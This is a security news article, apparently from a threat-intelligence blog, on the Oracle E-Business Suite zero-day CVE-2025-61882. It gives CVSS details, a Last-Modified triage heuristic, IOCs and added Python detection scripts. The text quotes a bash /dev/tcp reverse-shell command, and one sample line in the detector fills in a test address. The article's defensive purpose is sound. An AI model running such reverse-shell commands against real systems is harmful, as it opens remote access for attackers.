PoC Exploit Released for Remotely Exploitable Oracle E-Business Suite 0-Day Vulnerability


A critical zero-day vulnerability in Oracle E-Business Suite has emerged as a significant threat to enterprise environments, with proof-of-concept (PoC) exploit code now publicly available. 

CVE-2025-61882 carries a CVSS 3.1 base score of 9.8 (Critical) and enables remote code execution without authentication across multiple Oracle E-Business Suite versions.

The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14, specifically targeting the Oracle Concurrent Processing BI Publisher Integration component via the HTTP protocol. 

Oracle E-Business Suite RCE Vulnerability

Security researchers have identified a flaw that allows unauthenticated remote attackers to execute arbitrary code on vulnerable systems through network-based exploitation with low attack complexity.

Oracle’s security advisory emphasizes the vulnerability’s classification as “remotely exploitable without authentication,” meaning attackers can leverage network access without requiring valid credentials. 

The CVSS vector is network-based (HTTP) with low attack complexity, no privileges and no user interaction required, unchanged scope, and high impact on confidentiality, integrity, and availability (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, the vector that yields 9.8).


Organizations can identify potentially vulnerable instances with the public Nuclei detection template, which looks for the string "E-Business Suite Home Page" in the response body and compares the Last-Modified response header against October 4, 2025, the date Oracle released its Security Alert patch.

Oracle's October 2023 Critical Patch Update is a prerequisite for applying that Security Alert patch. Systems whose Last-Modified timestamp predates the October 4, 2025 threshold are flagged as likely unpatched. Treat this as a triage signal rather than proof: the header reflects file timestamps on the web tier, not a patch inventory, so confirm the applied patch level on the host before closing a finding.
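As an added example (not code from the article, from Oracle, or from the Nuclei template it mentions), the following Python re-implements the Last-Modified triage heuristic described above and runs it over constructed HTTP responses. The response record shape, the four verdict labels and the sample responses are this example's own assumptions; the fingerprint string and the October 4, 2025 threshold are taken from the text.

```python
"""Added example (not from the article, Oracle, or the Nuclei project): the
Last-Modified triage heuristic described above, applied to constructed
HTTP responses so it can run offline."""
from dataclasses import dataclass, field
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Threshold from the article: Oracle's Security Alert patch date for CVE-2025-61882.
PATCH_DATE = datetime(2025, 10, 4, tzinfo=timezone.utc)
FINGERPRINT = "E-Business Suite Home Page"


@dataclass
class HttpResponse:
    """Assumed minimal shape of a captured response (status, headers, body)."""
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""

    def header(self, name):
        # HTTP header names are case-insensitive.
        for k, v in self.headers.items():
            if k.lower() == name.lower():
                return v
        return None


def assess(resp):
    """Classify a response: 'not-ebs', 'ebs-unknown', 'likely-vulnerable' or 'patched-or-newer'."""
    if resp.status != 200 or FINGERPRINT not in resp.body:
        return "not-ebs"
    raw = resp.header("Last-Modified")
    if raw is None:
        return "ebs-unknown"          # header absent: the heuristic cannot decide
    try:
        stamp = parsedate_to_datetime(raw)
    except (TypeError, ValueError):   # malformed date (older Pythons return None instead)
        stamp = None
    if stamp is None:
        return "ebs-unknown"
    if stamp.tzinfo is None:          # "-0000" dates come back naive; treat as UTC
        stamp = stamp.replace(tzinfo=timezone.utc)
    return "likely-vulnerable" if stamp < PATCH_DATE else "patched-or-newer"


# Constructed sample responses (not captured from real hosts).
SAMPLES = {
    "unpatched": HttpResponse(200, {"Last-Modified": "Tue, 12 Aug 2025 09:14:00 GMT"},
                              "<title>E-Business Suite Home Page</title>"),
    "patched":   HttpResponse(200, {"last-modified": "Mon, 06 Oct 2025 11:00:00 GMT"},
                              "<title>E-Business Suite Home Page</title>"),
    "no_header": HttpResponse(200, {}, "<title>E-Business Suite Home Page</title>"),
    "other_app": HttpResponse(200, {"Last-Modified": "Tue, 12 Aug 2025 09:14:00 GMT"},
                              "<title>Welcome</title>"),
}


def triage(samples):
    """Return {name: verdict} for a batch of responses."""
    return {name: assess(resp) for name, resp in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name:10} -> {verdict}")
```

The "ebs-unknown" verdict is deliberate: a missing or unparsable Last-Modified header (common behind a CDN or reverse proxy that rewrites caching headers) must not be reported as "patched", because the heuristic simply has no data in that case.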

Risk Factors            Details
Affected Products       Oracle E-Business Suite 12.2.3 through 12.2.14
Impact                  Remote Code Execution
Exploit Prerequisites   Network access via HTTP; no authentication required
CVSS 3.1 Score          9.8 (Critical)

Active Exploitation

Active exploitation attempts have been documented through specific Indicators of Compromise (IOCs), including malicious IP addresses 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 conducting GET and POST activities. 

Threat actors are using reverse-shell commands of the form sh -c /bin/bash -i >& /dev/tcp// 0>&1 (the attacker's host and port have been stripped from the published IOC) to open an outbound interactive shell from the compromised host to attacker-controlled infrastructure. An outbound TCP connection from an application-tier server to an arbitrary internet address is itself a strong detection signal.

Forensic analysis reveals malicious artifacts including the exploitation toolkit oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) containing Python exploitation scripts exp.py and server.py. 

The archive's file name references Scattered Spider, Lapsus$, and Cl0p, which suggests a possible connection to those groups, but a name chosen by the tool's authors is not on its own evidence of attribution.
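As an added example (not code from the article or from any vendor tooling), the following Python applies the indicators quoted above to constructed data: the two published IP addresses against web-access log lines, the reverse-shell shape against process command lines, and the published SHA-256 against file contents. The log lines, command lines and the 203.0.113.5 TEST-NET address are constructed for this example; the IPs, hash and command shape are the article's.

```python
"""Added example (not from the article or any vendor tooling): a small IOC
sweep over constructed access-log lines, command lines and file bytes."""
import hashlib
import re

# Indicators as published in the article.
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d":
        "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip",
}
# The published reverse-shell IOC reads `sh -c /bin/bash -i >& /dev/tcp// 0>&1`
# with the attacker host and port stripped, so match the generic shape
# (interactive bash redirected into /dev/tcp/) rather than a fixed destination.
REVSHELL_RE = re.compile(r"bash\s+-i\b.*?>&\s*/dev/tcp/", re.IGNORECASE)

# Combined-log-format prefix: client IP, identity, user, timestamp, request line.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*"'
)


def scan_access_log(lines):
    """Return (ip, method, path) for each request from a listed IOC address."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m.group("ip") in IOC_IPS:
            hits.append((m.group("ip"), m.group("method"), m.group("path")))
    return hits


def scan_commands(cmdlines):
    """Return command lines that look like the bash /dev/tcp reverse shell."""
    return [c for c in cmdlines if REVSHELL_RE.search(c)]


def match_hash(data):
    """Return the IOC file name if the bytes hash to a listed SHA-256, else None."""
    return IOC_SHA256.get(hashlib.sha256(data).hexdigest())


# Constructed sample data (not real traffic): two IOC-sourced requests, one
# benign request, the published reverse shell, the same shell with a TEST-NET
# destination filled in, and one benign command.
SAMPLE_ACCESS_LOG = [
    '200.107.207.26 - - [04/Oct/2025:02:17:41 +0000] "GET /OA_HTML/ HTTP/1.1" 200 5120',
    '10.0.0.7 - - [04/Oct/2025:02:18:03 +0000] "GET /OA_HTML/ HTTP/1.1" 200 5120',
    '185.181.60.11 - - [04/Oct/2025:02:19:27 +0000] "POST /OA_HTML/ HTTP/1.1" 200 88',
]
SAMPLE_CMDLINES = [
    "sh -c /bin/bash -i >& /dev/tcp// 0>&1",
    "sh -c /bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "bash -c 'ls -la /u01/install'",
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("IOC address:", hit)
    for cmd in scan_commands(SAMPLE_CMDLINES):
        print("reverse shell:", cmd)
    print("hash match:", match_hash(b"not the toolkit"))
```

The command-line check belongs on process-execution telemetry (auditd, EDR, the application user's shell history), not on web logs; the IP check belongs on the reverse proxy or load balancer in front of the EBS web tier, where the true client address is still visible.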

Oracle strongly recommends the immediate deployment of patches across all affected E-Business Suite installations, emphasizing that only systems under Premier Support or Extended Support receive security updates. 

Organizations should monitor network traffic for the identified IOCs and run vulnerability assessments with the available detection templates; a Shodan query for html:"OA_HTML" (the path prefix of the E-Business Suite web interface) helps enumerate internet-exposed instances, which should be patched first.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.